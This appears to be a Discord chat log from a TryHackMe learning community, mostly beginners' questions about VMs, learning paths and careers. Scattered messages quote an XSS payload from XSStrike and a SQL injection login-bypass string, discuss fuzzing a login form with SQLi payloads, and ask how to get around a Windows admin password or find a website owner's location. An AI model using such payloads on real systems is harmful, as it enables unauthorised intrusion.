#quiet-conversation

1 messages Β· Page 12 of 1

next bronze
#

what 🀣

#

Well, I mean it's a valid precaution, but on a THM room kekw

magic hill
#

new goal: be able to hack my subaru

warped badger
#

Apparently it do not recognize Kali
I have to do manually but i don't want to make it wrong

warped badger
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2446)

warped badger
weary meteor
warped badger
weary meteor
warped badger
weary meteor
warped badger
#

i have 256 g free

weary meteor
warped badger
hybrid obsidian
#

can a cybersecurity certificate replace a bachelor's degree? If so, which ones?

weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2447)

weary meteor
warped badger
#

do i have to change something in the network section ?

weary meteor
warped badger
#

i tried to start it
"avorted"

weary meteor
warped badger
weary meteor
warped badger
weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2448)

weary meteor
warped badger
#

do you recommed to type "root" here ?

weary meteor
warped badger
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2450)

warped badger
#

I guess i have to choose the first one ?

#

i hope will not be limited by my choice in the futur

weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2453)

finite wasp
#

Hello!

noble pelican
#

Hey. If you are interested in LVM for creating partitions I could help

weary meteor
#

Which room ?

plain jackal
#

no room i got it from my professor i am unable to solve it

weary meteor
south inlet
plain jackal
#

ok

south inlet
plain jackal
#

okay

zinc iris
#

Sure that's faster , but it's helpful for ctfs

#

I did this room , it's the new one right ? I meant how to repair images , like in the challenges and ctf , png and jpg , tools and stuff

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2461)

weary meteor
harsh linden
warped badger
#

I can't access in some rooms in tryhackme ? (with my own vm i mean)
Task1 Javascript Essential

weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2476)

weary meteor
warped badger
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2477)

wide jackal
#

After I finish the free pathway, which CTFs do you recommend to practice?

weary meteor
# wide jackal After I finish the free pathway, which CTFs do you recommend to practice?
TryHackMe

This is a machine that allows you to practise web app hacking and privilege escalation

TryHackMe

Learn about active recon, web app attacks and privilege escalation.

TryHackMe

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2478)

jovial jay
#

Hello

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2501)

elfin talon
odd acorn
warped badger
elfin talon
sour fable
#

hello

weary meteor
undone basin
#

hey guys! i'm looking for people to collab with so we can work together on tryhackme

zinc iris
#

hi everyone , just finished Biohazard room it's very fascinating one ! every room DesKel made are brillint so far

weary meteor
weary meteor
undone basin
weary meteor
#

Well still we're here to collab πŸ˜„ . Feel free to reach out whenever needed πŸ˜„

weary meteor
weary meteor
# undone basin how?

Press Add friend button below Skill matrix . My THM username is KGBTHM πŸ™‚

undone basin
#

okay

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2543)

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @undone basin (current: #2629 - 1)

wide jackal
#

I got a challenge from one of my colleagues to decrypt a file. It's not in any common format and is probably heavily encrypted. How do I proceed?

#

Most probably a custom built algorithm.

south inlet
wide jackal
south inlet
wide jackal
south inlet
wide jackal
twin ridge
#

From the owasp crypto cheatsheet

twin ridge
#

So it's probably based on some combination of xors

#

The crypto algorithm itself is always deterministic

wide jackal
hoary nymphBOT
#

Gave +1 Rep to @twin ridge (current: #13 - 616)

twin ridge
twin ridge
radiant jacinth
#

Hay... I'm am not able to connect to internet in my attack machine on them website.
Does anyone know how to fix it ?!

weary meteor
#

If not then AttackBox doesn't have Internet access 😦

radiant jacinth
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2557)

oak umbra
#

hello

mental knot
#

@weary meteor what Are the benefits of using the own VM as attacker

inner granite
#

I have an issue with am PC running Windows 10, someone changed the admin password and didn’t write it down. They left and we can’t access anything. We are logged in as a user (not admin) how can I change/find the password?

tawdry dove
inner granite
tawdry dove
#

Who's computer is this

#

That's something you would know if the computer was your responsibility, I would think.

mental knot
inner granite
mental knot
south inlet
inner granite
#

It’s a private club, sorta like a frat, it has a Workgroup domain

inner granite
undone basin
weary meteor
weary meteor
radiant jacinth
weary meteor
radiant jacinth
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @earnest solar (current: #1297 - 3)

radiant jacinth
radiant jacinth
mental knot
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2582)

#

You're still on cooldown

weary meteor
weary meteor
radiant jacinth
mental knot
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2583)

weary meteor
radiant jacinth
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @earnest solar (current: #1049 - 4)

warped badger
#

i'm trying to install burp suite,
it's the first app i install on kali, how can I know if the installation is done ?

weary meteor
warped badger
weary meteor
warped badger
weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2584)

sinful forge
#

Good morning, what is the best DNS poisoning tool in kali to learn?

warped badger
#

My VM kali freeze after fews minutes cause of inactivity πŸ˜•

weary meteor
warped badger
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2588)

zinc iris
frail tendon
next bronze
#

wdym proxy chain?

kindred turtle
#

MAC address is on a similar level (but it's a part of your NIC which is assigned by the manufacturer) as your private IP assigned to your device via a router

#

Your MAC address and Private IP address are used in the routing scheme of a modem

#

Your router will be using NAT to translate this for communication with IPv4, IPv6 uses a different protocol

#

Then your public IP address is the routers address, used by the ISP to allow you access to the internet

#

Your VPN client sits before the ISP level, which means the ISP can only see that you have connected to the VPN server but doesn't know what you're accessing

#

You don't need a proxy chain. Although you want to make sure you configure the VM right and ensure sandbox escape is really difficult

radiant jacinth
kindred turtle
hoary nymphBOT
#

Gave +1 Rep to @earnest solar (current: #904 - 5)

radiant jacinth
kindred turtle
radiant jacinth
kindred turtle
kindred turtle
radiant jacinth
#

you're welcome πŸ˜‰

kindred turtle
#

XD

radiant jacinth
hoary nymphBOT
#

Gave +1 Rep to @kindred turtle (current: #600 - 9)

radiant jacinth
#

xD

kindred turtle
#

So what type of stuff are you interested in?

radiant jacinth
kindred turtle
radiant jacinth
#

what about youu

#

awesome

kindred turtle
#

Yeah, man I'm interested in exploit chains ATM

radiant jacinth
#

I like that

kindred turtle
#

No one wants to talk about it though haha

radiant jacinth
#

haha every one has his favorite stuffs

kindred turtle
radiant jacinth
kindred turtle
#

Created a customizable one, where you capture the raw packets and each proxy performs a different function or used by a controller

radiant jacinth
#

yeah I see

kindred turtle
#

It's like burp suite without the gui

#

Because I can't afford premium

#

Gotta improvise

radiant jacinth
#

yes I understand, by the way I have not too much time since I started my journey ^^
I'm still learning

kindred turtle
#

Ohh that's all good

#

We all have a lot to learn honestly

#

My tip would be don't get caught up in the specifics unless it actually interests you

radiant jacinth
#

yes there is so much things to learn

hoary nymphBOT
#

Gave +1 Rep to @kindred turtle (current: #554 - 10)

kindred turtle
#

I can keep listing if you want

#

Those aren't specifics though

radiant jacinth
#

not all of them

#

I learnt the osi model, cia, pyramid of pain

kindred turtle
#

Nice, the cyber kill chain is an important framework, MITRE ATT&CK,
You probs have already learnt a bit about the pentesting process.. which is planning, recon, exploitation, post exploitation (priv esc, persistence, anonymity), and reporting
Attack vectors and methodology for each step along the penetration testing framework

kindred turtle
radiant jacinth
kindred turtle
# radiant jacinth yes exactly πŸ™‚

You learnt about different protocols and the ports they run on as well?
It's good to research each protocol's structure and how it communicates with other technologies

kindred turtle
hoary nymphBOT
#

Gave +1 Rep to @earnest solar (current: #791 - 6)

kindred turtle
kindred turtle
radiant jacinth
kindred turtle
#

I haven't learnt about LTS yet

radiant jacinth
#

yeah, so you have to check it out

#

sorry I mean, TLS

kindred turtle
#

Oh yeah truee

#

SSL/TLS is very important

radiant jacinth
#

sure yes, TLS is the upgraded version of SSL

kindred turtle
#

Yeah you can capture that handshake and do some fun things with it

#

I use the cryptography library in python or pyopenssl

#

Or sockets

radiant jacinth
#

Oh, I don't know about pyopenssl

kindred turtle
#

It helps you verify web certificates, pull information from them and play around with the TLS/SSL cryptography

radiant jacinth
#

Ah yeah I remember it thanks

zinc iris
scenic wharf
#

Hi

weary meteor
scenic wharf
#

I'm new here and I wanna learn hacking

weary meteor
scenic wharf
#

Any advice dude

weary meteor
flint plank
light hull
#

Huhu

warped badger
#

Is it because of the vulnerable VM that the site got an F ?

weary meteor
warped badger
quaint basin
#

No, it's because THM, somewhat ironically but not particularly surprisingly, doesn't have any security headers set. At all.

#

Also got an x-powered-by header leaking through cloudflare which is fun.

quaint basin
#

Heh, unfortunately I'm familiar with the dev team. I do not.

warped badger
quaint basin
#

No comment kekw

warped badger
#

mkay

twin ridge
#

ah so they do

#

they really should get around to implementing webauthn

iron iris
#

Hi guys, I would like you to guide me regarding the SOC Simulator please. It mentions that it lasts two hours, that is, do I have to be online for two hours solving tickets to get a rating? I've seen a lot of tickets come up, I've been there for less than two hours and all my progress has been lost 😦
Oh and one more thing, will it be free forever or just in January? πŸ˜… πŸ‘‰πŸ»πŸ‘ˆπŸ»

weary meteor
quaint basin
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2695)

obtuse bear
#

Hey everyone I need help I solved some questions on the webosint room like 2 or 3 hours ago but when I re-open the room. This is saying room is locked the room owner has locked this room to access material start machine and answer questions sh***tt!!!!!

weary meteor
obtuse bear
#

@weary meteor But Why this is happend ? I solved some of it

south inlet
obtuse bear
#

@south inlet okay got it

sinful prism
#

Hi, I just completed SOC Level 1 and want to practice more to strengthen my skills. My goal is to secure an internship or job in this field. Could you suggest some premium or free rooms for practice? Also, if there are any open opportunities for me, please let me know.

sinful prism
#

already completed SureBruh

sinful prism
#

thanks...!

forest igloo
#

Hi! Is someone that has obtained the PortSwigger Certification, Im curious about the difficulty of the exam and the necessary time to learn to can pass the cert

rapid trail
#

Hello general is geeking out,
Concerning scholarships for incoming college freshman, can I put THM as a project I have worked on in the last three years?

tawdry dove
rapid trail
#

I also included things like creating a personal network monitor and self teaching python.

#

Its a weird essay type field where I have to explain everything I have done relating to my major, I dont know why it asks that and then asks for my student resume (which Includes THM)

tawdry dove
rapid trail
rapid trail
tawdry dove
#

I'm confused. I thought you said you were an incoming freshman

rapid trail
#

Yes, highschool sophomore year and junior year

#

Im currently a high school senior

#

Oh well, I think I added enough to the roster. I hit the word count limit on the essay.

#

College as a whole is confusing some of these prompts for scholarships are bad

β€œIf you were an animal what would you be and why”

acoustic epoch
#

A fish so I could never drown

wicked tide
#

I want to become a cybersecurity analyst in the future, but I’m confused about which roadmap to follow. When I search for a cybersecurity analyst roadmap on Google, I mostly find general cybersecurity roadmaps. I don’t understand where to start. Also, are cybersecurity and cybersecurity analyst the same field, or is there a difference?

weary meteor
radiant jacinth
weary meteor
radiant jacinth
radiant jacinth
# weary meteor It is

Then why does it say "Command 'mysql' not found, but can be installed with:

apt install mysql-client-core-8.0 # version 8.0.39-0ubuntu0.20.04.1, or
apt install mariadb-client-core-10.3 # version 1:10.3.39-0ubuntu0.20.04.2"?

radiant jacinth
weary meteor
# radiant jacinth No

Then your AttackBox doesn't have Internet access . That's why it can't download those dependencies

radiant jacinth
weary meteor
radiant jacinth
weary meteor
radiant jacinth
#

"Options error: You must define TUN/TAP device (--dev)
Use --help for more information."

weary meteor
radiant jacinth
mystic flower
#

Imma put this here,

TryHackMe has actually made me feel better in life
Before trying it out I was in Networking Lessons in my college and feeling like I could do more, unmotivated and kinda depressed.
But after doing some I got addicted to it and enjoyed learning and solving the problems giving.

Since, I have a good habit of connecting and learning everyday, replaced most of my gaming with eductional / side projects.
and got offers for interships in my local area.
Met some cool people that have a shared interest in cyber and some cool opportunities

Goated community and platform

weary meteor
radiant jacinth
weary meteor
south inlet
#

absolute path will work.

#

That config looks blank.

radiant jacinth
weary meteor
#

Delete old file beforehand

radiant jacinth
weary meteor
radiant jacinth
weary meteor
radiant jacinth
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @coarse violet (current: #2643 - 1)

radiant jacinth
#

Now I have another issue

#

Considering I got the correct credentials after a long scanning proccess with Nmap, I try connecting to the MySQL Server from the target machine and I get this error

radiant jacinth
# weary meteor add `--skip-ssl` flag

The flag you mentioned earlier solved part of the problem. I'm trying with the user 'root' and an empty password. However, for some reason, it denies the access

weary meteor
south inlet
#

Not with -p

#

That command should work.

radiant jacinth
south inlet
radiant jacinth
hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #1 - 3334)

quaint sail
#

@radiant jacinth The time on VM should be the same as your laptop/time zone

undone basin
#

hey @weary meteor how do we accept a request on tryhackme?

weary meteor
undone basin
restive garnet
#

heyyyyyyyyyyyyyyyyyyy

zinc iris
#

hi

#

any one know a room about curl ?

#

I was reading a write up and the author use curl insted of burp , then I try that and it was faster

tawdry dove
tawdry dove
weary meteor
zinc iris
zinc iris
weary meteor
# zinc iris okay any close ones or other resorsed about it ?

Sadly , there're no rooms at all that cover curl . There're two rooms that mention how curl can be used in some use cases for jwt and auth. bypass , but they don't actually go into details on how to use curl 😦 . However I will link them below so you can check them out if you're interested . Also I would recommend you to check curl's official documentation , it has a dedicated section on how to use tool for various protocols and use cases πŸ™‚
https://curl.se/docs/manpage.html
https://tryhackme.com/r/room/authenticationbypass
https://tryhackme.com/r/room/jwtsecurity
https://tryhackme.com/r/room/contentdiscovery

zinc iris
#

thx alot, I'll check them out

twilit lantern
#

+rep @weary meteor

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 2791)

civic hull
odd acorn
#

It's a third-party service, likely an integration or app, and the leak doesn't contain anything sensitive. Most of those IP addresses will change soon

civic hull
#

🫑 🀝 Thank you for clarification

burnt cobalt
#

the irony that restorecord is advertised as "everything you need to protect and grow your Discord server" lol

normal fable
#

Hi Team,
I have a quick question regarding Azure Task 22 - Advent of Cyber 2024.
I successfully obtained the credentials for the user wvusr-backupware@aoc2024.onmicrosoft.com, but unfortunately, when I tried to log in using "az login," it asked for MFA, but throughout the lab, we didn't set up MFA for this particular account. Kindly help me resolve this matter.

radiant jacinth
#

Does anybody know any free room available for Pentesting?

weary meteor
weary meteor
shrewd sedge
#

Hey guys. So while working on a room I stumbled upon a very specific problem which I would like to know alternatives or ideas for as a solution. So whenever you send out a POST request using Firefox which originates from a HTML form element, the body of the network packet and the Content-Type in the header is application/x-www-form-urlencoded by default. Meaning the key value pairs are percent (URL) encoded and follow the scheme: key=value&key=value so there is an ampersand between them as separation. I successfully found an SQL injection payload which worked on the login form using a fuzzer program. However, the payload only works if it is NOT percent encoded and the key value pairs are separated by an ampersand (&) in the POST body AND the HTTP header states the Content-Type as application/x-www-form-urlencoded, so the format has to be: username=PAYLOAD&password=PAYLOAD. However, in HTML there are only 3 enctypes which can be used in a form and none of them replicate this exact behavior where there is no percent encoding and data is separated by & rather than new line characters (like in text/plain). Not to mention that the Content-Type in the header won't be stated as application/x-www-form-urlencoded if I use a different enctype parameter in the form method. So any ideas on what I could do to make Firefox send out POST requests with the data formatted in a way I want it to be (no percent encoding but ampersand separation), with the Content-Type staying application/x-www-form-urlencoded in the HTTP header, so Firefox handles the response packets and displays whatever is after the login page for me to see? (instead of having the fuzzer program tell me what reply it got and not being able to interact with the website - because it's not the web browser that is interpreting the network packets)

south inlet
south inlet
spice vapor
#

So in THM CTFs why they dont have tags like hack box which tell us its related to web or networking or RE etc

weary meteor
#

But you can still search by keywords , recommendations are pretty good πŸ™‚

spice vapor
south inlet
#

Suggest to bring it back.

weary meteor
spice vapor
#

Yeah lets bring them back

#

I have submitted my feedback about tags on CTFs I think few more can bring them back

soft pier
shrewd sedge
soft pier
#

but if you have the username of the user from the database you can login with it on firefox

#

alternatively some people have found login bypass by doing things like gobuster/ffuf

shrewd sedge
#

Also, it wouldn't matter what username I logged in with, since if I sent the correct string as the password it let me in. That's why my problem stands, firefox has no POST format that would support the way these packets allowed me access to the next page.

#

So I manually had to analyze the packets and then access the redirection from Firefox. If there were cookies used, I would have been in trouble achieving this.

#

And I can not find any information on commanding Firefox to create packets (form enctype= neither) regarding Content-Type as application/x-www-form-urlencoded in the POST header, and having the POST body use the same encoding without percent encoding on the values. This is only for convenience so I don't have to manually do packet analysis.

soft pier
#

user' AND 1=1 -- -

#

the password is impossible to get unless you do heavy brute force on the hash

shrewd sedge
#

Yeah I haven't got any real usernames or passwords. I just used SQL payloads to 'login'.

#

But let me try to simplify the situation. The fuzzing programs returned SQL payloads that won't work in web browsers because how browsers create the POST packets, meaning I can not easily 'login' and see what's after the login page.

#

So I was wondering if anyone has a solution on telling the browser how I want my POST body to be constructed.

soft pier
#

no idea... never touched much of the firefox dev tools for post http method

shrewd sedge
#

Right, you guys probably have a list of payloads that can break the php script even if the input is percent encoded. That's probably why I couldn't find an answer to this or why nobody encountered the same problem in the write-ups neither.

twin ridge
glacial zealot
#

I’m probably in the wrong place so if anyone could offer me a bit of guidance in the right direction, I would greatly appreciate it. I’m seeking help with possible infidelity regarding my partner that isn’t an obvious scam. Pls go easy on me. It’s hard to live with this feeling in the pit of my stomach & im not sure how much longer I can go on not being able to make sense of the small things that I notice but cannot put together. Thank you for your time.

fathom panther
zinc iris
#

Hi everyone

#

I was wondering , do I got points in THM for making a room or a ctf ?

weary meteor
radiant jacinth
#

@weary meteor what's your opinion on what i posted in #room-ideas πŸ€”

#

Would it be too repetitive? idk

twin ridge
untold pecan
#

The new feature on answer box is awesome, don't have to count by sticking my finger on the screen any more

crimson prairie
#

helloπŸ™‚

#

may I ask for advice on how to remove infected APK files from mobile phones? I have even performed a factory reset, yet the app keeps reappearing after I delete it.

#

I don't know where it came from on my phone

#

My phone's antivirus has alerted me that root access has been granted without my consent, which is scary.

#

I analyzed the apk file permissions and found the following risky permissions

[android:usesCleartextTraffic=true]
android.permission.BIND_JOB_SERVICE
[android:exported=true]
android.permission.REQUEST_INSTALL_PACKAGES
android.permission.WRITE_EXTERNAL_STORAGE

south inlet
#

You can't root a phone without access to the phone physically.

#

Which Anti-virus do you use?

crimson prairie
south inlet
crimson prairie
#

The most interesting thing is that the apk called Magisk but it is infected version

south inlet
#

Have you downloaded the Magisk before?

crimson prairie
south inlet
#

You need access to the phone to enable the boot loader and USB debugging, both of these are not enabled by default.

#

If you factory reset the phone, and you download from a cloud back up, this could be installing the app.

crimson prairie
south inlet
#

Not very well it seems.

crimson prairie
south inlet
crimson prairie
#
#

I posted about it here too

south inlet
#

Did you answer from Bleeping Madman?

#

Which handset do you use?

crimson prairie
south inlet
crimson prairie
#

ill send my device info now

#

Redmi 9A
M2006C3LG

#

Android version 10

south inlet
#

I'd honestly factory wipe the phone, and create a brand new account.

#

Don't re-log in with a Google account (if you do)

crimson prairie
crimson prairie
crimson prairie
#

Last year, someone targeted my phone with this kind of malicious apk and when I submitted it to virustotal, it was Ajina named malware.

surreal quiver
#

How credible is medium?

weary meteor
#

I prefer github for cyber stuff over it

surreal quiver
# weary meteor Just a blog platform

Yeah but are the writers any credible. They seem to be working in the field and for some things even google searches give medium as result. Depends on what you are searching for. The advice still seems legit.

weary meteor
crimson prairie
south inlet
surreal quiver
weary meteor
crimson prairie
faint linden
#

Guys, I finished the pre security learning path. Next I'm starting the SOC level 1 path. Any advice on how I should approach this learning path would be great.. I'm a newbie thanks

weary meteor
weary meteor
faint linden
zinc iris
#

the eternal respect sounds good

twin ridge
zinc iris
#

thx

twin ridge
#

Someone was unhappy with my last room and managed to break the downvotes

zinc iris
#

what was your last room ?

south inlet
#

For legal reasons this is a joke

quaint basin
twin ridge
#

true

#

I got quite a few

#

(it's still medium in my eyes)

quaint basin
#

I consider my latest a HTB Medium standard.

#

We're gonna find out if I've got any better at judging these kekw

twin ridge
#

probably get reclassified as a hard

south inlet
quaint basin
south inlet
quaint basin
#

None that I can remember?

#

That was an annoying box though, so it's possible lmao

desert sky
#

@weary meteor you must have a lot of CTF's under your belt to be a mythic lol

weary meteor
zinc iris
# twin ridge true

Can I add you so I can ask you questions if I have any, since you did create rooms before ?

next turret
fathom panther
#

Not saying I’m a pro myself but I recently looked through some walkthroughs for a CTF I was doing lol

next turret
fathom panther
#

No need to bang your head against the wall for a CTF challenge if a writeup is available (provided that you’ve at least tried and exhausted your options).

weary meteor
# next turret <@719261261665402921> Do pros follow writeups too?

Well i ain't a pro but i was using a lot of writeups when i was on beginning of my journey , they proved to be very useful , especially if you can find a good author that suits you πŸ™‚ . Write-up should be detailed and guided foe it to have some purpose . It should walk you through each step so you can understand what's going on and what should you do πŸ™‚

feral kelp
#

Writeups are very useful bc if you’re really stuck you can add the info to your toolbox for future challenges ❀️

wintry mantle
#

hello guys anyone have tryhackme monthly coupon code ?

south inlet
forest igloo
#

just curious, for hacking do you prefer 75 or 80% keyboards?

tidal wraith
#

Any recommendations on a pair of blue tooth over the ear microphone boom mic headsets?

novel mango
mystic flower
crimson robin
#

Hii Guyzz

#

Anyone intrested to be bussiness partner with me

gleaming blade
weary meteor
gleaming blade
#

Ofc, those not real ones im aim for just wanted to know if its worth smthing.. Thank ublobfingerguns

weary meteor
boreal jewel
#

https://www.youtube.com/watch?v=Ut2YF7j318I

Love this clip and this aspect of the job. Was stuck on AdvancedElkQueries, T3Q2, reread the question at least a few dozen times. Know I'm pulling more logs than it wants, can't think of what they want for the second filter.

Shut it down, take a shower, refresh the coffee, and look a the question again. Immediatly notice they want a particular server type.

Now if I can just find somebody that'll pay me to do this type of thing.

Watch the stream here:
https://piratesoftware.live

Join the community here:
https://discord.gg/piratesoftware

#Shorts #Twitch #PirateSoftware

β–Ά Play video
quaint basin
#

If anyone technical on the hiring team sees them in the "Certifications" section it's an instant red flag that you aren't familiar with the difference between a certificate of completion and a certification

crimson prairie
gleaming blade
quaint basin
#

Yeah, LinkedIn is fine, and saying on your CV that you've done them is no bad thing in lieu of experience either

crimson prairie
gleaming blade
quaint basin
# crimson prairie I’m trying to figure out if I’m ready to apply for a job or internship. Could yo...

The postings should be pretty upfront about this stuff. You're generally not expected to be responsible for anything (at least alone) as an intern either. Assuming it's offensive security you're applying for:

  • I would expect an intern to have reasonable foundational knowledge across the core topics (networking, the basics of OS internals, web technologies, ideally cloud, etc), but gaps are fine. Keenness to learn is more important.
  • For a junior pentester I would expect roughly OSCP level -- i.e., enough knowledge to go off and do a core job under the leadership of a senior tester.
quaint basin
crimson prairie
hoary nymphBOT
#

Gave +1 Rep to @quaint basin (current: #10 - 844)

radiant jacinth
#

This is kinda out of topic, but is anyone familiar with discord - someone somehow fabricated this screenshot to make me look like i sent them a scam server link, istg i've'nt. they made it looks so convincing, just wondering if anyone knows how they did it

#

they somehow changed my original message to something completely different

serene trench
#

Discord is rendered as HTML on the client side

#

no different to being able to F12 on a website and update the client/viewers copy of the text

radiant jacinth
# serene trench Discord is rendered as HTML on the client side

oh right thank you. this really buzzed me off so much. full context i was modding a server and he was self advertising. i was baiting him to give a link, which he did, i was stupid and revealed too soon i was gonna mod him. he deleted his link and made that above ss

hoary nymphBOT
#

Gave +1 Rep to @serene trench (current: #9 - 912)

radiant jacinth
#

ive learnt to install vencord (to see deleted messages) and to be stealthier in the future

serene trench
#

No worries:) yeah pretty annoying I can imagine. The desktop client for Discord is just electron - a desktop web browser basically. Fairly easy to doctor text/messages/etc just by changing the HTML and taking say a screenshot

#

but it's only on that persons view - doesn't change the actual message

radiant jacinth
#

does it mean - if i force them to reload and screenrecord. this wont work as he will just say i deleted the message

radiant jacinth
serene trench
#

Yeah, if the client's/persons view is refreshed it'll show the actual message

radiant jacinth
#

discord doesnt keep the full DM transcripts too, sad

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @quaint basin (current: #10 - 845)

turbid walrus
#

Advice needed!!Im into blue teaming and was wondering will a iMac work

fair vine
fluid flicker
#

hello, any one from UK?

south inlet
fluid flicker
#

happy to know that

ember epoch
#

hi

south inlet
# ember epoch hi

Please don't post the same message in multiple channels, the bot may mute you.

weary meteor
#

Well we're all here to help πŸ™‚

radiant jacinth
#

πŸ‘‹
Kind of weird to ask this.. I'm very much into philosophy, but something I've never considered as a philosophical enquiry is ethical hacking, what falls into ethical and unethical? Apart from the obvious... I wanna hear people's opinions/personal philosophies more than anything

#

Myself coming into this area I would consider "ethical hacking" anything that might be deemed acting against the better of other people, so if it means bringing a bad actor that poses a danger to vulnerable populations or generally speaking a bad actor toward a community, to justice, that would surely be ethical, right?

On the other hand I believe simply hacking for the sake of "revenge" or "personal dislike" is simply capricious and unethical, or for the betterment of oneself. At the end of the day it should bring good and betterment to the state of something of a larger population.

Then again I haven't given it much thought

ionic hornet
south inlet
radiant jacinth
#

Basically what I meant

radiant jacinth
tawdry dove
zinc iris
#

any one finished this room :

#

can I go through it with out a a background about brim ?

surreal quiver
#

What exactly does this output from xsstrike mean: Payload: <HTmL%0doNPoInTeRenTeR+=+[8].find(confirm)%0dx//

surreal quiver
tawdry dove
#

If it's THM content, #room-help is the best place to receive assistance

surreal quiver
haughty minnow
#

Anyone from India?

gaunt robin
#

hello everyoneblobfingerguns

mental copper
#

Ello everbody

glad flare
turbid walrus
#

Yollloo

#

a secondary device so uhmm iPad or laptop πŸ˜… as a blue teamer!!

turbid walrus
ornate bolt
#

Wassup

radiant rampart
#

hello everyone

weary meteor
wise smelt
#

on tryhackme how to avail voucher anyone

weary meteor
gritty pebble
#

word of the day: hagiography

hagiography is biography that idealizes or idolizes a person and their life

frigid sandal
#

Hello folks

gritty pebble
#

hello folk!

frigid sandal
#

Hello there

mental copper
zinc iris
gritty pebble
#

lmao

#

word of the day: gallant

meaning: someone or something described as gallant is very courageous and brave. gallant is also sometimes used to mean β€œlarge and impressive” (as in β€œa gallant ship”), or to describe someone who has or shows politeness and respect for women.

wise smelt
# weary meteor What do you mean ?

I mean to say that there is tickets section where it shows different tickets, some of them are for availing like baseball cap from track me

weary meteor
remote forge
#

Anyone from Malaysia??

smoky glacier
#

what should i better do next?

weary meteor
smoky glacier
#

the thing is i am building my foundations so i want it all.

#

then i will edit my CV accordingly after the next Milestone and try to integrate in the Hi tec industry.

#

KGB You are always helping Thank you so much for doing this. it's important to tell you this i dont know im not if you get this appreciation very often but you should you deserve it. be blessed!

weary meteor
# smoky glacier what should i better do next?

Well path on the left is focused on blue teaming activities ( DFIR , SIEM, ... )
Path in the center is focused on red teaming activities ( web app pentesting and vulns, priv. escalation , recon,... )
Path on the right side is focused on DevOps and security of the process πŸ™‚

smoky glacier
#

KGB if i am shifting from Construction to Cyber i am feeling like everything is so in my blood so interesting and i am so eager and willing to learn yet seen something that make me feel like "ok this part is not for me", is it normal?

#

therefore i thought to learn everything in the paths.
i love by the way THM very much. Amazing platform always talk about with friends.
THM should advertise in TV more themselves the Platform.it amazing.

weary meteor
smoky glacier
#

I think ill follow the middle as i am already there and Do the 2 more paths i have there. All of the best for you and everybody here and good luck studying and Never give up ❀️‍πŸ”₯ Never Ever fall to the trap of despair and your life will be good hard times are always temporary. Wish you all Happiness.

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @smoky glacier (current: #2671 - 1)

small pelican
#

hi i cant connect to openvpn anyway dose someone have goog ideas?

spice rose
#

Hey guys, I was wondering which rooms/labs would be best for me to prepare for "IT Security and Compliance Specialist I" role this would be my first tech job and I'm extremely nervous lol I want to make sure I know everything I need to and be as best prepared as possible.

weary meteor
spice rose
#

anything that would help me prepare best for the role

spice rose
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 3175)

weary meteor
hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #2 - 3176)

weary meteor
uneven lava
#

A friend gave me a Kobo Mini, but it's reeeeally little. So now I'm writing a pdf with all the most useful commands to have it as a companion while doing the rooms.

What do you guys think of this use?

unborn depot
weary meteor
radiant jacinth
zinc iris
#

can I turn on 2 vms in my computer and try to attack one from the other ?!

nova linden
chrome elbow
hollow umbra
#

Hey, i was trying with the SMOL room today. While i enter the url to add smol site to/etc/roots it's not responding. anyone facing the same issue, or am i going wrong somewhere. pls help!

zinc iris
chrome elbow
#

I’ll grab the link real quick

weary meteor
weary meteor
ornate bolt
#

Ello

weary meteor
copper jungle
#

Hi

weary meteor
vast summit
#

Hello

zinc iris
#

I was trying the magician room , and every time I try to upload the image to the website so I can get a reverse shell it refuse to upload even so it's a png

weary meteor
gritty pebble
#

word of the day: billet-doux

meaning: love letter. the word's plural is billets-doux.

uneven lava
hoary nymphBOT
#

Gave +1 Rep to @twin ridge (current: #13 - 622)

unborn depot
#

Happy Valentines day folks, it always crops up a little PTS for me as I remember working for Dell at a tech support call center in the early 2000's and a small repeat of the ILOVEYOU virus happened.

fluid flicker
#

Don't click that link is fishing

mystic tulip
#

Hey guys, is it beneficial or heck, necessary to learn Splunk to get cyber security internships or jobs ? I see it appearing on a lot of job requirements these days

weary meteor
surreal quiver
#

Hey there, can kali be used as a primary OS or is it better to use it in a VM?

south inlet
surreal quiver
hoary nymphBOT
#

Gave +1 Rep to @south inlet (current: #1 - 3392)

wispy topaz
#

I need to rang my gig πŸ₯ΊπŸ˜€
Who can help me free here

weary meteor
wispy topaz
#

I have been battling with low impression on my gigs I need someone who can help me out in strategical way am ready to learn

high wasp
#

How can I know the physical location of admin of a website? I find from whois and other source of their DNS and public IP, the person pays service not to disclose their real location. In this case, no-one can find where they come from?

#

Does anyone know please?

fathom panther
high wasp
#

Short answer: to find if I protect myself..

#

long answer - being scammed, and want to track bad people

quiet yacht
#

Hey, is anyone here done the OSCP (PEN-200) who can answer some questions? (i hope its allowed to ask this question here.)

